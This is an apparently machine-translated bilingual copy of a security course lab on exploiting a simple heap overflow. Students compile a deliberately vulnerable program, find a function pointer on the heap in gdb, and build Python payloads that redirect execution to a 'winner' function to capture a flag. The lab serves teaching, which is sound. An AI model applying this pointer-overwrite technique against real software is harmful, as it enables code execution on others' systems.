ED 205: Very Simple Heap Overflow (10 pts) ED 205:非常简单的堆溢出(10分)

What You Need你需要什么

A 32-bit x86 Kali Linux machine, real or virtual. 32位x86 Kali Linux机器,真实或虚拟。 The project was written on Kali 2.该项目写在Kali 2上。

Purpose目的

To practice exploiting a very simple heap overflow vulnerability.练习利用非常简单的堆溢出漏洞。 This one is easy to exploit because there's a pointer in the heap that is used for a function call.这个很容易被利用,因为堆中有一个用于函数调用的指针。 That makes a heap overflow as simple as a stack overflow targeting EIP.这使得堆溢出就像针对EIP的堆栈溢出一样简单。

Creating a Vulnerable Program创建一个易受攻击的程序

This program just echoes back text from its command-line argument.该程序只是回显其命令行参数中的文本。

In Kali, in a Terminal window, execute these commands:在Kali中,在终端窗口中,执行以下命令: 

curl https://samsclass.info/127/proj/heap0.c > heap0.c curl https://samsclass.info/127/proj/heap0.c> heap0.c
gcc heap0.c -w -g -no-pie -z execstack -o heap0 gcc heap0.c -w -g -no-pie -z execstack -o heap0
./heap0 HELLO ./heap0你好
./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
As shown below, running the program with "HELLO" works, showing a "level has not been passed" message, but running it with 90 'A' characters causes a "Segmentation fault".如下所示,运行带有“HELLO”的程序有效,显示“级别尚未通过”消息,但运行90“A”字符会导致“分段错误”。

Examining the Source Code检查源代码

In Kali, in a Terminal window, execute these commands:在Kali中,在终端窗口中,执行以下命令: 
 nano heap0.c
As shown below, two objects are defined (called "data structures"), which will be stored in a portion of memory called a "heap".如下所示,定义了两个对象(称为“数据结构”),它们将存储在称为“堆”的内存部分中。

The first object is name[64] , which has enough space for 64 characters.第一个对象是name [64] ,它有足够的空间容纳64个字符。

Then comes fp , which holds a 4-byte pointer--that is, a RAM address.然后是fp ,它包含一个4字节的指针 - 即一个RAM地址。

Finally, there's a function named winner() .最后,还有一个名为winner()的函数。 As you might expect, our goal is to execute that function.正如您所料,我们的目标是执行该功能。

Scroll down to see the rest of heap0.c, as shown below.向下滚动以查看heap0.c的其余部分,如下所示。

Close the file with Ctrl+X .使用Ctrl + X关闭文件。

Observing the Heap观察堆

Execute these commands to run the program in the gdb debugger, place a breakpoint, run it with a short input string, and examine the process map:执行这些命令以在gdb调试器中运行程序,放置断点,使用短输入字符串运行它,并检查流程图: 
gdb ./heap0 gdb ./heap0
list 25,40清单25,40
b 38 b 38
run AAAA运行AAAA
info proc map info proc map
Find the heap.找到堆。 When I did it, the heap was the fourth item on the list, starting at 0x804b000, as shown below.当我这样做时,堆是列表中的第四项,从0x804b000开始,如下所示。

Execute this instruction to see the contents of the heap, replacing the address with the correct address of the heap on your system.执行此指令以查看堆的内容,将地址替换为系统上堆的正确地址。 

 x/120x 0x804b000
Find "0x41414141" on the heap, as shown below.在堆上找到“0x41414141”,如下所示。 You may have to press Enter to see more pages of memory to find it on your system.您可能必须按Enter才能查看更多内存页面以在系统中找到它。

As highlighted below, two values are stored on the heap: "0x41414141" is 'AAAA', and a short distance after that there's an address, which was 0x080484c1 when I did it.如下面突出显示的那样,堆上存储了两个值:“0x41414141”是'AAAA',之后有一个短距离,有一个地址,当我这样做时为0x080484c1。

Execute this instruction to disassemble the function "nowinner".执行此指令以反汇编函数“nowinner”。 

 disassemble nowinner
As shown below, this function starts at the address stored on the heap: 0x080484c1 on my system.如下所示,此函数从存储在堆上的地址开始:0x080484c1在我的系统上。

Execute these instructions to exit the debugger.执行这些指令退出调试器。 

q q
y ÿ

Observing a Crash观察崩溃

In Kali, in a Terminal window, execute this command:在Kali中,在终端窗口中,执行以下命令: 
 nano h1
Enter this code, as shown below:输入此代码,如下所示: 
 #!/usr/bin/python print 'A' * 90

Save the file with Ctrl+X , Y , Enter .使用Ctrl + XYEnter保存文件。

Execute these commands to make the file executable, test it, and send it to heap0:执行这些命令使文件可执行,测试并将其发送到heap0: 

 chmod a+x h1 ./h1 ./heap0 $(./h1)

90 characters are enough to crash the program. 90个字符足以使程序崩溃。

Controlling the EIP控制EIP

Execute these commands to make a modified attack file, to find out what characters ended up in $eip.执行这些命令以生成修改后的攻击文件,以找出$ eip中最终出现的字符。 
 cp h1 h2 nano h2
Modify the file to send only 70 'A' characters followed by 20 bytes in a nonrepeating pattern, as shown below.将文件修改为仅以非重复模式发送70个“A”字符,后跟20个字节,如下所示。

Save the file with Ctrl+X , Y , Enter .使用Ctrl + XYEnter保存文件。

Debugging the Program调试程序

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.执行这些命令以在gdb调试器中运行程序,将攻击发送给它,并检查寄存器。 
 gdb -q ./heap0 run $(./h2) info registers q y
As shown below, the program crashes with $eip = 0x36303530, or the ASCII text '0506'.如下所示,程序崩溃为$ eip = 0x36303530,或ASCII文本'0506'。

On my system, the characters before the EIP were 70 "A"s + '0001020304' for a total of 80 characters.在我的系统上,EIP之前的字符是70“A”s +'0001020304',总共80个字符。

Targeting the EIP针对EIP

Execute these commands to make an modified attack program that attempts to put 'BCDE' into the EIP.执行这些命令以制作修改后的攻击程序,试图将“BCDE”放入EIP。 
 cp h2 h3 nano h3
Modify the file as shown below.修改文件,如下所示。

Save the file with Ctrl+X , Y , Enter .使用Ctrl + XYEnter保存文件。

Debugging the Program调试程序

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.执行这些命令以在gdb调试器中运行程序,将攻击发送给它,并检查寄存器。 
 gdb -q ./heap0 run $(./h3) info registers
As shown below, the program crashes with $eip = 0x45444342, or the ASCII text 'BCDE'.如下所示,程序崩溃为$ eip = 0x45444342,或ASCII文本'BCDE'。

Finding an Address to Inject查找要注入的地址

Execute these commands to disassemble the winner() function.执行这些命令来反汇编winner()函数。 
 disassemble winner q y
As shown below, the function started at address 0x08048496 on my system.如下所示,该函数从我系统上的地址0x08048496开始。 Your address may be different--use the address you see on your screen.您的地址可能会有所不同 - 使用您在屏幕上看到的地址。

The Final Exploit File最终的漏洞利用文件

Execute these commands to make another attack program that puts 0x08048496 into the EIP.执行这些命令以制作另一个将0x08048496放入EIP的攻击程序。 
 cp h3 h4 nano h4
Modify the file as shown below.修改文件,如下所示。

Save the file with Ctrl+X , Y , Enter .使用Ctrl + XYEnter保存文件。

ED 205.1 Heap Exploit (10 pts) ED 205.1堆利用(10分)

Testing the Exploit测试漏洞利用

Execute this command:执行以下命令: 
 ./heap0 $(./h4)
The flag appears, covered by a green box in the image below.该标志出现,由下图中的绿色框覆盖。

Sources来源

https://www.vulnhub.com/series/exploit-exercises,11/# https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/10/exploit-exercises-heap-0/ https://www.mattandreko.com/2012/01/10/exploit-exercises-heap-0/

Posted 9-17-15 by Sam Bowne由Sam Bowne发表于9-17-15
Revised 9-28-15修订9-28-15
Revised for Kali 2018.1 2-22-18修订为Kali 2018.1 2-22-18
Tested on Kali 2018.3 x86 and it worked fine 9-22-18在Kali 2018.3 x86上测试,它在9-22-18工作正常